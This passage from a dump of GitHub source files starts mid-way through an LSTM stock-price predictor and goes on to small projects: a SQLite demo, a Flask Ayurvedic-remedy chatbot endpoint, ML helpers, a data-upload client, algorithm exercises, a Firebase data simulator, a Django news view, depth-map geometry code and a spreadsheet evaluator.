+ datetime.timedelta(days=1) \n        days_to_predict = self.trading_days_helper.get_trading_days_in_range(prediction_start, to_date)\n\n        # If a base (updated) dataset is provided, the previous values are taken from there,\n        # otherwise they are taken from the training set\n        if base_dataset is not None:\n            inputs = base_dataset.dataframe.query(\n                \"symbol == '{}' and date <= '{}'\"\\\n                .format(self.ticker_symbol, self.training_end))\\\n                .close.values\n        else:\n            inputs = self.training_set.close.values\n\n        # The array 'inputs' contains the closing prices in the time sequence,\n        # it is initially loaded with self.timesteps elements whose\n        # last element corresponds to the date when the training ended.\n        inputs = inputs[len(inputs) - self.timesteps:]\n        inputs = inputs.reshape(-1,1)\n        inputs = self.scaler.transform(inputs).reshape(-1)\n\n        y = []\n\n        for i in range(0, len(days_to_predict)):\n            # Taking the next sequence of size self.timesteps of closing prices from 'inputs'\n            x = np.array(inputs[i : i + self.timesteps])\n            # Re-shaping to be used by the LSTM as input\n            x = np.reshape(x, (1, self.timesteps, 1))\n\n            # Predicting the next value in the time sequence (it needs to be scaled back)\n            pred = self.model.predict(x)\n            y.append(self.scaler.inverse_transform(pred).reshape(-1)[0])\n\n            # If a base (updated) dataset is provided, the following value in the time sequence is taken\n            # from there if it exists (it needs to be scaled), otherwise the predicted value is used.\n            existing_rec = base_dataset.dataframe.query(\n                \"date == '{}' and symbol == '{}'\".format(days_to_predict[i], self.ticker_symbol)) \\\n                if base_dataset is not None else None\n            if existing_rec is not None and len(existing_rec) > 0:\n                inputs = np.append(\n                    inputs, self.scaler.transform(existing_rec.close.values.reshape(-1,1)).reshape(-1)[0])\n            else:\n                inputs = np.append(inputs, pred)\n\n        return pd.DataFrame({'symbol': self.ticker_symbol,\n                             'date': days_to_predict,\n                             'predicted_price': y})\\\n            .query(\"date >= '{}' and date <= '{}'\".format(from_date, to_date))\n            # Filtering to get just the days in the given prediction range","repo_name":"egar-garcia/machine-learning-engineer-nanodegree-capstone","sub_path":"djia_stock_prediction.py","file_name":"djia_stock_prediction.py","file_ext":"py","file_size_in_byte":37783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"17146733189","text":"import sqlite3\n\n# If the database does not exist, it will be created\ncnx = sqlite3.connect(\"formation.db\")\ncurseur = cnx.cursor() # allows executing queries on the DB\n\n# Creating a table in the DB\ncurseur.execute(\"CREATE TABLE IF NOT EXISTS employe (nom TEXT, prenom TEXT)\")\n\n# Inserting an employee into the DB\n# curseur.execute(\"INSERT INTO employe (nom, prenom) VALUES ('Doe', 'John')\")\n\n# Second method: insertion via a dictionary\nemploye_variable = {\n    'lastname' : \"Zarella\",\n    'firstname' : \"Maude\" # it could also be passed as a variable taken from user input, for example\n}\n#curseur.execute(\"INSERT INTO employe (nom, prenom) VALUES (:lastname, :firstname)\", employe_variable)\n\n# insertion method with a tuple\nemploye_tuple = ('Hochet', 'Rick')\ncurseur.execute(\"INSERT INTO employe (nom, prenom) VALUES (?, ?)\", employe_tuple)\n\n# When the columns of a table in the DB are modified, the changes must be saved (committed)\ncnx.commit()\n\ncnx.close()\n","repo_name":"gdpe404/formation_avancee_python","sub_path":"02-bdd/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"15873704230","text":"import os\nimport pymongo\nfrom flask_restful import Resource, reqparse\nfrom langchain.embeddings.huggingface import HuggingFaceEmbeddings\nfrom llama_index import (\n    LangchainEmbedding,\n    ServiceContext,\n    StorageContext,\n    load_index_from_storage,\n    set_global_service_context,\n)\nfrom llama_index.memory import ChatMemoryBuffer\n\nos.environ[\"TOKENIZERS_PARALLELISM\"] = \"False\"\nos.environ[\"OPENAI_API_KEY\"] = os.getenv(\"FLASK_OPENAI_API_KEY\")\n\ntry:\n    client = pymongo.MongoClient(os.getenv(\"FLASK_MONGODB_URI\"))\n    db = client[\"hackathon\"]\n    print(\"Connected to the dev database successfully.\")\nexcept pymongo.errors.ConnectionFailure as e:\n    print(\"Failed to connect to the dev database: %s\" % e)\n\nmedicineRef = db[\"medicine\"]\n\nmodel = LangchainEmbedding(HuggingFaceEmbeddings(model_name='sentence-transformers/all-MiniLM-L6-v2'))\nservice_context = ServiceContext.from_defaults(embed_model=model)\nset_global_service_context(service_context)\n\nstorage_context = StorageContext.from_defaults(persist_dir=\"./AI/disease_remedy_index\")\nmedical_index = load_index_from_storage(storage_context)\n\nmemory = ChatMemoryBuffer.from_defaults(token_limit=1500)\n\nayurvedic_remedy_engine = medical_index.as_chat_engine(\n    chat_mode=\"context\",\n    memory=memory,\n    system_prompt=\"\"\"\n    Act as an ayurvedic doctor suggesting ayurvedic remedies for diseases.
\n    I will provide you a disease name; you should provide me ayurvedic remedies for that disease in brief.\n    \"\"\" ,\n)\n\nclass AyurvedicRemedies(Resource):\n\n    def post(self):\n        parser = reqparse.RequestParser()\n        parser.add_argument(\"disease\", type=str, required=True, help=\"disease is required\")\n\n        args = parser.parse_args()\n        disease = args[\"disease\"]\n        data = {\n            \"disease\": disease,\n            \"remedy\": getAyurvedicRemedies(disease)\n        }\n\n        return {\"error\": False, \"data\": data}, 200\n\n\ndef getAyurvedicRemedies(disease):\n    try:\n        response = ayurvedic_remedy_engine.chat(disease)\n        return response.response\n    except Exception as e:\n        return {\"error\": True, \"message\": str(e)}, 500\n","repo_name":"jhenilparihar/AyuCare","sub_path":"backend/resources/remedies.py","file_name":"remedies.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30886545627","text":"import functools\nimport gc\nimport multiprocessing as mp\nimport os\nfrom typing import Any, Callable, Dict, List, NoReturn, Tuple\n\nimport hydra\nimport joblib as jl\nimport numpy as np\nimport omegaconf\n\n\ndef make_path(dataset_params: Dict[str, str]) -> str:\n    # Both keys are required to build the path\n    if not (\"path\" in dataset_params and \"file\" in dataset_params):\n        raise KeyError(\"`dataset_params` does not contain the information necessary.\")\n\n    return os.path.join(dataset_params[\"path\"], dataset_params[\"file\"])\n\n\ndef load_metadata(folders: List[str], files: List[str]) -> Dict[str, Any]:\n    overrides_ = [f\"+{a}={b}\" for a, b in zip(folders, files)]\n\n    with hydra.initialize_config_module(config_module=\"conf\"):\n        metadata = hydra.compose(overrides=overrides_)\n\n    return omegaconf.OmegaConf.to_object(metadata)\n\n\ndef load_dataset_params(dataset: str):\n    return load_metadata([\"data\"], [dataset])[\"data\"]\n\n\ndef execute_in_multplipe_processes(\n    functions: List[Callable[[Any], Any]], fn_args: List[Tuple[Any]]\n) -> NoReturn:\n\n    spawned_processes = []\n\n    if fn_args is None:\n        fn_args = [tuple()] * len(functions)\n    else:\n        if len(functions) != len(fn_args):\n            raise ValueError(\n                \"List of arguments and list of functions have mismatched lengths.\"\n            )\n\n    for fn, args in zip(functions, fn_args):\n        process = mp.Process(target=fn, args=args)\n        process.start()\n        spawned_processes.append(process)\n\n    # map is lazy, so each process must be joined explicitly\n    for process in spawned_processes:\n        process.join()\n\n\ndef run_in_parallel(\n    function: Callable[[Any], Any],\n    values: List[Any],\n    backend: str = \"loky\",\n    n_jobs: int = 4,\n    verbose: int = 2,\n) -> List[Any]:\n    results = jl.Parallel(n_jobs=n_jobs, backend=backend, verbose=verbose)(\n        jl.delayed(function)(x) for x in values\n    )\n\n    gc.collect()\n    return results\n\n\ndef log_execution_start(fn):\n    @functools.wraps(fn)\n    def wrapper(*args, **kwargs):\n        print(f\"Started execution of `{fn.__name__}`\")\n        return fn(*args, **kwargs)\n\n    return wrapper\n\n\ndef _compute_one_dimension_size(\n    input_dim_size: int, filter_dim_size: int, stride: int, padding: int\n) -> int:\n    return np.floor(\n        ((input_dim_size + 2 * padding - filter_dim_size) / stride) + 1\n    ).astype(np.int32)\n\n\ndef _same_convolution_padding(filter_shape: Tuple[int, int]) -> Tuple[int, int]:\n    filter_height, filter_width = filter_shape\n    same_padding_height, same_padding_width = (\n        (filter_height - 1) / 2,\n        (filter_width - 1) / 2,\n    )\n    return same_padding_height, same_padding_width\n\n\ndef convolution_output_dimension(\n    input_shape: Tuple[int, int],\n    filter_shape: Tuple[int, int],\n    stride: Tuple[int, int],\n    padding: Tuple[int, int],\n    num_filters: int,\n) -> Tuple[int, int, int]:\n    input_height, input_width = input_shape\n    filter_height, filter_width = filter_shape\n    stride_height, stride_width = stride\n    padding_height, padding_width = padding\n\n    output_height = _compute_one_dimension_size(\n        input_height, filter_height, stride_height, padding_height\n    )\n\n    output_width = _compute_one_dimension_size(\n        input_width, filter_width, stride_width, padding_width\n    )\n\n    return (output_height, output_width, num_filters)\n","repo_name":"statsgustavo/facial-keypoints-detection","sub_path":"src/facial_keypoints_detection/tools/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"13185923394","text":"from .base import MljarHttpClient\nfrom ..model.dataset import Dataset\nfrom ..exceptions import FileUploadException\n\nfrom ..log import logger\n\nclass DataUploadClient(MljarHttpClient):\n    '''\n    Client to upload data into MLJAR.\n    '''\n    def __init__(self):\n        self.url = \"/s3policy/\"\n        super(DataUploadClient, self).__init__()\n\n    def _get_signed_url(self, project_hid, file_path):\n        data = {'project_hid':project_hid, 'fname': file_path.split('/')[-1]}\n        response = self.request(\"POST\", self.url, data = data)\n        return response.json()\n\n    def upload_file(self, project_hid, file_path):\n        logger.info('File upload started')\n        url_data = self._get_signed_url(project_hid, file_path)\n        signed_url = url_data['signed_url']\n        dst_path = url_data['destination_path']\n        with open(file_path, 'rb') as fin:\n            response = self.request(\"PUT\", signed_url, data=fin.read(),\n                                    with_header=False, url_outside_mljar=True,\n                                    parse_json=False)\n        if response.status_code != 200:\n            raise FileUploadException('There was a problem with data upload into MLJAR')\n        return dst_path\n","repo_name":"yutfut/TMO","sub_path":"Laba#6:курсовая/venv/lib/python3.9/site-packages/mljar/client/dataupload.py","file_name":"dataupload.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20332548693","text":"t = int(input())\nmax_sum = 0\n\nfor idx in range(1,t+1):\n    n,m = map(int, input().split())\n    tc = []\n    for i in range(n):\n        tc.append(list((map(int, input().split())))) # end of test case input\n\n    for i in range(n-m+1):\n        for j in range(n-m+1):\n            sum = 0\n            for k in range(m):\n                for l in range(m):\n                    sum += tc[i+k][j+l]\n            if sum>max_sum:\n                max_sum = sum\n\n    print(f\"#{idx} {max_sum}\")\n    max_sum = 0\n    \n\n    ","repo_name":"yeoneed/Algorithm_byme","sub_path":"SWEA/2001_파리_퇴치.py","file_name":"2001_파리_퇴치.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"7700195628","text":"import firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nfrom random import randint\n\ncred = credentials.Certificate(\"../credentials/rh.json\")\nfirebase_admin.initialize_app(cred)\n\nimport random\nimport time\n\ndef strTimeProp(start, end, format, prop):\n    stime = time.mktime(time.strptime(start, format))\n    etime = time.mktime(time.strptime(end, format))\n    ptime = stime + prop * (etime - stime)\n    return time.strftime(format, time.localtime(ptime))\n\n\ndef randomDate(start, end, prop):\n    return strTimeProp(start, end, '%Y-%m-%d %I:%M %p', prop)\n\ndef generateData():\n    data = {\n
u'addedBy':u'4uaHJ1zzB9ZWiySnr610oD3oFat2',\n u'category':u'Inventory',\n u'cost':randint(50,60),\n u'date':u''+str(randomDate(\"2017-1-1 1:30 PM\", \"2018-1-1 4:50 AM\", random.random())),\n u'itemId':u'CPoMrmIlyHrKAb7xtejG',\n u'logId':u''+str(randint(1,1000)),\n u'logType':u'Added',\n u'quantity':randint(1,5),\n u'remarks':u'dsfvdsc',\n u'selectedColumns':u'Boys',\n u'subCategory':u'Assets'\n }\n return data\n\ndb = firestore.client()\n\nfor i in range(0,100):\n data = generateData()\n db.collection(u'logs').document(data['logId']).set(data)","repo_name":"DarshanGowda0/ML-Reaching-Hands","sub_path":"python-clients/simulate_data.py","file_name":"simulate_data.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72644851930","text":"from spots_detection import empty_spots_detection as d_spots\nimport numpy as np\nimport cv2\n\n\ndef get_available_spots(image,id):\n alpha = 0.5\n empty_spots=d_spots.detect_empty_spots(image,id)\n cp_image = np.copy(image)\n new_image = np.copy(image)\n amount=len(empty_spots[0])+len(empty_spots[1])+len(empty_spots[2])\n for i in range(len(empty_spots)):\n for box in empty_spots[i]:\n x1, y1, x2, y2 = box\n cv2.rectangle(cp_image, (int(x1), int(y1)), (int(x2), int(y2)), (0, 255, 0), -1)\n cv2.addWeighted(cp_image, alpha, new_image, 1 - alpha, 0, new_image)\n cv2.putText(new_image, \"Total: %d\" % amount, (30, 125),\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.7, (255, 255, 255), 2)\n return new_image","repo_name":"lacusver/parking_lot_detection","sub_path":"spots_detection/detection_on_frame.py","file_name":"detection_on_frame.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24715209595","text":"import typing as T\n\nimport flask\nimport markupsafe\n\n# pt1: add app, serve index\n# pt2: add \"messaging\" and \"user\"\n\napp = flask.Flask(__name__)\n\n\n# \"messaging\"\n\nusers = [\n \"a\",\n \"b\",\n]\n\ncreds = {\n \"a\": \"1234\",\n \"b\": \"1234\",\n}\n\nmessages = {\n \"a\": [\n {\n \"from\": \"b\",\n \"msg\": \"hey\",\n },\n ],\n \"b\": [\n {\n \"from\": \"a\",\n \"msg\": \"weird to write myself for a demo in front of an audience?\",\n },\n ],\n}\n\n\n# index\n\n\n@app.route(\"/\")\ndef index():\n msg = \"

    Hello, World!
    \"\n return msg\n\n\n# user\n\n\n@app.route(\"/user\")\n@app.route(\"/user/\")\ndef user_msg(user: T.Optional[str] = None):\n user = markupsafe.escape(user) if user is not None else None\n if user not in users:\n flask.abort(404)\n return f\"User {user} {messages[user]}\"\n","repo_name":"poppyargus/py-talk-flask-2023-04","sub_path":"pt2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"44348158450","text":"# 1. Create a route_info function to pass the dictionary to\n# 2. If the dictionary has a distance key and its value is an integer, return the string \"Distance to your destination is \".\n# 3. Otherwise, if the dictionary has speed and time keys, return the string \"Distance to your destination is \".\n# 4 Otherwise return the string \"No distance info is available\".\n# 5. Call the function several times with different arguments\n\n\ndef route_info(route):\n if ('distance' in route) and (type(route['distance']) == int):\n return f\"Distance to your destination is {route['distance']}\"\n\n if ('speed' in route) and ('time' in route):\n return f\"Distance to your destination is {route['speed'] * route['time']}\"\n\n return \"No distance info is available\"\n\n\nmy_dict_a = {\n 'distance': 200,\n 'speed': 60,\n 'time': 2,\n}\n\nmy_dict_b = {\n 'speed': 60,\n 'time': 2,\n}\n\nmy_dict_c = {\n 'transport': 'car',\n 'color': 'red',\n 'time': 2,\n}\n\n\nprint(route_info(my_dict_a))\nprint(route_info(my_dict_b))\nprint(route_info(my_dict_c))\n\n","repo_name":"exorive/Python","sub_path":"Udemy_HW_if_instructions.py","file_name":"Udemy_HW_if_instructions.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41447773636","text":"import nest\nimport sys\n\nnest.Install(\"cerebmodule\")\n\nVT = nest.Create(\"volume_transmitter_alberto\", 1)\n\nPRE = nest.Create(\"iaf_cond_exp\", 1)\nPOST = nest.Create(\"iaf_cond_exp\", 1)\n\nconn_param1 = {\"model\": 'stdp_synapse_sinexp',\n \"A_minus\": -0.01, # double - Amplitude of weight change for depression\n \"A_plus\": 0.01, # double - Amplitude of weight change for facilitation \n \"Wmin\": 0.0, # double - Minimal synaptic weight \n \"Wmax\": 4.0, # double - Maximal synaptic weight, \n \"weight\": 1.0,\n \"delay\": 1.0}\n\nnest.Connect(PRE,POST,{'rule': 'one_to_one'},conn_param1)\nA=nest.GetConnections(PRE,POST)\nnest.SetStatus(A,{'vt_num': 0})\n\nconn_param2 = {\"model\": 'stdp_synapse_cosexp',\n \"A_minus\": -0.01, # double - Amplitude of weight change for depression\n \"A_plus\": 0.01, # double - Amplitude of weight change for facilitation \n \"Wmin\": 0.0, # double - Minimal synaptic weight \n \"Wmax\": 4.0, # double - Maximal synaptic weight, \n \"weight\": 1.0,\n \"delay\": 1.0}\n\nnest.Connect(POST,PRE,{'rule': 'one_to_one'},conn_param2)\nA=nest.GetConnections(POST,PRE)\nnest.SetStatus(A,{'vt_num': 0})\n\nsys.exit(0) #Everything went fine\n","repo_name":"alberto-antonietti/CerebNEST","sub_path":"Tests/Check_Models.py","file_name":"Check_Models.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"70174951773","text":"val = float(input(\"Informe o valor a ser pago: \"))\ncond = int(input(\"Informe a condição de pagamento\"\n \"\\n[1]À Vista\\n[2]À Vista no cartão\\n[3]Em 2x no Cartão\\n[4]Em 3x ou mais no 
Cartão\\nDigite a opção: \"))\navi = val-(val*10)/100\navic = val-(val*5)/100\ncar2 = val\ncar3 = val+(val*20)/100\n\nif cond == 1:\n print(\"O valor do produto fica por: R${}\".format(avi))\nelif cond == 2:\n print(\"O valor do produto fica por: R${}\".format(avic))\nelif cond == 3:\n print(\"O valor do produto fica por: R${}\".format(val))\nelse:\n parc = int(input(\"Informe a quantidade de parcelas: \"))\n print(\"O valor sairá por: R${} em {} parcelas de R${}\".format(car3,parc,car3/parc))","repo_name":"GustavoJatene/practice","sub_path":"044.py","file_name":"044.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13588487354","text":"from http.client import HTTPResponse\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, Http404\nfrom news.models import News\nfrom .forms import NewsForm\n\ndef index(request, *args, **kwards):\n qs = News.objects.all()\n context = {'news_list': qs}\n return render(request, 'index.html', context)\n\ndef detail_view(request, pk):\n try:\n obj = News.objects.get(id=pk)\n except News.DoesNotExist:\n raise Http404\n \n print(request.POST)\n print(request.GET)\n print(request.method == \"POST\")\n print(request.method == \"GET\")\n\n return render(request, 'news/detail.html', {'single_object': obj})\n \n\n\n\n\ndef test_view(request, *args, **kwargs):\n print(request.GET)\n return HttpResponse(\"test view\")\n\ndef create_view(request, *args, **kwargs):\n form = NewsForm(request.POST or None)\n\n if form.is_valid():\n data = form.cleaned_data\n News.objects.create(**data)\n print(form.cleaned_data) \n return render(request, 'forms.html', {'form': form})\n\n\n\n \n\n","repo_name":"megamagomed/My-first-application","sub_path":"first_app/news/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42311992449","text":"import torch \n\n\ndef _create_frustum(depth_map, input_size, downsample):\n '''\n depth_map: B, N, n_depth, H, W \n '''\n # make grid in image plane\n n_depth = depth_map.shape[2]\n device = depth_map.device\n ogfH, ogfW = input_size\n fH, fW = ogfH // int(downsample), ogfW // int(downsample)\n assert fH == depth_map.shape[3] and fW == depth_map.shape[4], (fH, fW, depth_map.shape)\n ds = depth_map \n ds = ds.clamp(0.)\n B, N_cam, D, H, W = ds.shape\n xs = torch.linspace(0, ogfW - 1, fW, dtype=torch.float).view(1, 1, fW).expand(B, N_cam, D, fH, fW).to(device)\n ys = torch.linspace(0, ogfH - 1, fH, dtype=torch.float).view(1, fH, 1).expand(B, N_cam, D, fH, fW).to(device)\n\n # B, N_cam, D, H, W, 3\n frustum = torch.stack((xs, ys, ds), -1)\n return frustum\n\n\ndef get_geometry(frustum, rots, trans, intrins, post_rots, post_trans, offset=None):\n \"\"\"Determine the (x,y,z) locations (in the ego frame)\n of the points in the point cloud.\n Returns B x N x D x H/downsample x W/downsample x 3\n \"\"\"\n B, N, _ = trans.shape\n # undo post-transformation\n # B x N x D x H x W x 3\n points = frustum - post_trans.view(B, N, 1, 1, 1, 3)\n if offset is not None:\n _,D,H,W = offset.shape\n points[:,:,:,:,:,2] = points[:,:,:,:,:,2]+offset.view(B,N,D,H,W)\n points = torch.inverse(post_rots).view(B, N, 1, 1, 1, 3, 3).matmul(points.unsqueeze(-1))\n\n # cam_to_ego\n points = torch.cat((points[:, :, :, :, :, :2] * points[:, :, :, :, :, 2:3],\n points[:, :, :, :, :, 2:3]\n ), 5)\n if intrins.shape[3]==4: # for 
KITTI\n shift = intrins[:,:,:3,3]\n points = points - shift.view(B,N,1,1,1,3,1)\n intrins = intrins[:,:,:3,:3]\n combine = rots.matmul(torch.inverse(intrins))\n points = combine.view(B, N, 1, 1, 1, 3, 3).matmul(points).squeeze(-1)\n points += trans.view(B, N, 1, 1, 1, 3)\n\n # points_numpy = points.detach().cpu().numpy()\n return points\n\n\ndef _decorate_points(points_map, decoration_img): \n bs, n_cam, n_depth, h, w, _ = points_map.shape \n decoration_img = decoration_img.permute(0, 1, 3, 4, 2).unsqueeze(2) # shape: bs, n_cam, 1, h, w, 3\n decoration_img = decoration_img.expand((bs, n_cam, n_depth, h, w, 3))\n points_map = torch.cat((points_map, decoration_img), dim=-1) # shape: bs, n_cam, n_depth, h, w, 6. dimensions: x, y, z, r, g, b\n return points_map \n\ndef convert_depth_map_to_points(depth, input_size, downsample, rots, trans, intrins, post_rots, post_trans, decoration_img=None, return_batch_idx=True):\n bs, n_cam, n_depth, h, w = depth.shape\n # depth.shape == (bs, n_cam, n_depth, h, w)\n frustum = _create_frustum(depth, input_size, downsample)\n geom = get_geometry(frustum, rots, trans, intrins, post_rots, post_trans)\n\n if decoration_img is not None: \n geom = _decorate_points(geom, decoration_img)\n \n if return_batch_idx:\n geom = geom.view(-1, geom.shape[-1])\n\n batch_ix = torch.cat([torch.full([geom.shape[0] // bs, 1], ix,\n device=depth.device, dtype=torch.long) for ix in range(bs)])\n return geom, batch_ix\n else: \n geom = geom.view(bs, -1, geom.shape[-1])\n return geom \n\n","repo_name":"duanyiqun/DiffusionDepth","sub_path":"src/model/ops/depth_map_to_points.py","file_name":"depth_map_to_points.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","stars":204,"dataset":"github-code","pt":"32"} +{"seq_id":"19779748142","text":"# https://programmers.co.kr/learn/courses/30/lessons/12977\nimport itertools\n\n\ndef solution(nums):\n answer = 0\n # itertools -> permutation(순열), combinations(조합)\n comb_list = itertools.combinations(nums, 3)\n\n for comb in comb_list:\n total = sum(comb)\n for i in range(2, total // 2 + 1):\n if total % i == 0:\n break\n else:\n answer += 1\n\n return answer\n","repo_name":"YAEJIN-JEONG/Algorithm","sub_path":"프로그래머스/Lv1. 소수 만들기/경진/Lv1. 소수 만들기.py","file_name":"Lv1. 
소수 만들기.py","file_name":"Lv1. 소수 만들기.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"74367621852","text":"L = [3, 3, 1, 5, 4]\nlista = []\nfim = len(L)\nwhile fim > 1:\n    trocou = False\n    x = 0\n    while x < (fim - 1):\n        if L[x] > L[x + 1]:\n            trocou = True\n            temp = L[x]\n            L[x] = L[x + 1]\n            L[x + 1] = temp\n        x += 1\n    if not trocou:\n        break\n    fim -= 1\nfor e in L:\n    lista.append(e)\n\nprint(lista)\n\n# THE PROGRAM WILL WORK THE SAME WAY, LEAVING THE\n# NUMBERS IN ORDER EVEN WHEN REPEATED\n","repo_name":"yhammartes/Livro_Python","sub_path":"cap006/exer_15.py","file_name":"exer_15.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27385873875","text":"\"\"\"\nSheet mechanics.\nProvides functionality for adding calculation rows with cells, followed by the calculation mechanics.\n\"\"\"\n\nfrom typing import Dict, Tuple, Union\n\nfrom excel.cell.cell import CellValue\nfrom excel.cell.expression_value import ExpressionValue\n\n\nclass Sheet:\n    \"\"\"\n    Sheet\n    \"\"\"\n\n    def __init__(self, size_line: str):\n        \"\"\"\n        :param size_line: The line defining the sheet size\n        :raise: ValueError\n        \"\"\"\n\n        self._size: SheetSize = SheetSize.parser(size_line)\n        self._cell_list: Dict[Tuple[int, int], Union[CellValue, str, int]] = {}\n\n    def get_size(self) -> 'SheetSize':\n        \"\"\"\n        Get the sheet size\n        \"\"\"\n\n        return self._size\n\n    def add_line(self, line: str):\n        \"\"\"\n        Add a row of cells\n\n        :param line: The line with the cell values\n        :raise: ValueError\n        \"\"\"\n\n        error_text = f'Строка со значением ячеек должна содержать ' \\\n                     f'\"{self._size.x}\" выражений разделенных символом табуляции!'\n\n        if not isinstance(line, str):\n            raise ValueError(error_text)\n\n        cell_value_list = line.split('\\t')\n        if not (len(cell_value_list) == self._size.x):\n            raise ValueError(error_text)\n\n        if len(self._cell_list) >= self._size.y * self._size.x:\n            raise ValueError('Достигнут предел размерности таблицы по вертикали!')\n\n        # Fill the current row with cells\n        line_number = int(len(self._cell_list) / self._size.x) + 1\n        for i, value in enumerate(cell_value_list):\n            self._cell_list[(i + 1, line_number)] = CellValue.parser(value)\n\n    def calculate(self) -> Dict[Tuple[int, int], Union[str, int]]:\n        \"\"\"\n        Calculate the values\n        :return The key is a tuple (x, y), the value is the computed expression\n        \"\"\"\n\n        if not (len(self._cell_list) == (self._size.x * self._size.y)):\n            raise RuntimeError(f'Инициализация не закончена. '\n                               f'Кол-во заданных ячеек \"{len(self._cell_list)}\" из \"{self._size.x * self._size.y}\"')\n\n        sheet_cell_value = {}\n\n        # Compute the result for all non-expressions.\n        for key, cell_value in self._cell_list.items():\n            sheet_cell_value[key] = \\\n                cell_value.get_value() if not isinstance(cell_value, ExpressionValue) else cell_value\n\n        # Compute the result for all expressions.\n        for key, cell_value in sheet_cell_value.items():\n            if isinstance(cell_value, ExpressionValue):\n                cell_value.calc(key, sheet_cell_value)\n\n        return sheet_cell_value\n\n\nclass SheetSize:\n    \"\"\"\n    Sheet size.\n\n    The maximum sheet dimensions are derived from the statement\n    'Cell references consist of a single Latin letter followed by a digit'.\n    \"\"\"\n\n    MAX_Y = 9\n    \"\"\"\n    Maximum vertical sheet size (1-9)\n    \"\"\"\n\n    MAX_X = 26\n    \"\"\"\n    Maximum horizontal sheet size (A-Z)\n    \"\"\"\n\n    def __init__(self, y: int, x: int):\n        \"\"\"\n        :param y: The vertical size\n        :param x: The horizontal size\n\n        :raise: ValueError\n        \"\"\"\n\n        if not(isinstance(y, int) and 0 < y <= self.MAX_Y):\n            raise ValueError(f'Размер по вертикали должен лежать в диапазоне 1-{self.MAX_Y}!')\n        self._y: int = y\n\n        if not(isinstance(x, int) and 0 < x <= self.MAX_X):\n            raise ValueError(f'Размер по горизонтали должен лежать в диапазоне 1-{self.MAX_X}!')\n        self._x: int = x\n\n    @property\n    def y(self) -> int:\n        \"\"\"\n        Get the vertical size\n        \"\"\"\n        return self._y\n\n    @property\n    def x(self) -> int:\n        \"\"\"\n        Get the horizontal size.\n        \"\"\"\n        return self._x\n\n    @classmethod\n    def parser(cls, line: str) -> 'SheetSize':\n        \"\"\"\n        Parse the sheet size\n\n        :param line: The line (in the format Y\\tX)\n        :raises ValueError:\n        \"\"\"\n\n        error_text = f'Строка с размером листа должна быть в формате \"<1-{cls.MAX_Y}>/t<1-{cls.MAX_X}>\"!'\n\n        if not (isinstance(line, str) and line):\n            raise ValueError(error_text)\n\n        values = line.split('\\t')\n        if not (len(values) == 2 and values[0].isdigit() and values[1].isdigit()):\n            raise ValueError(error_text)\n\n        return SheetSize(int(values[0]), int(values[1]))\n","repo_name":"musohranov/excel","sub_path":"src/excel/sheet.py","file_name":"sheet.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30303332198","text":"from .PhysicsEntity import PhysicsEntity\nfrom pygame import Rect, Surface\nimport math\nimport pygame\n\n\nclass Bullet(PhysicsEntity):\n    def __init__(self, origin_pos, target_pos, lifetime, bullet_image=None, damage=1, base_velocity=5, **kwargs):\n\n        x = target_pos[0] - origin_pos[0]\n        y = target_pos[1] - origin_pos[1]\n        direction = math.atan2(y,x)\n        x_velocity = math.cos(direction) * base_velocity\n        y_velocity = math.sin(direction) * base_velocity\n\n        bullet_image = Surface((8, 8), pygame.SRCALPHA)\n        bullet_image.fill((0, 0, 0, 0))\n        pygame.draw.circle(bullet_image, (255, 200, 0), (4, 4), 4)\n\n        rect = Rect(origin_pos, bullet_image.get_size())\n        self.lifetime = lifetime\n        super(Bullet, self).__init__(rect=rect, image=bullet_image, gravity=0,\n                                     x_velocity=x_velocity, y_velocity=y_velocity, **kwargs)\n\n    def update(self, **kwargs):\n        self.lifetime -= 1\n        super(Bullet, self).update(**kwargs)\n\n    def gone(self, tick):\n        return self.lifetime <
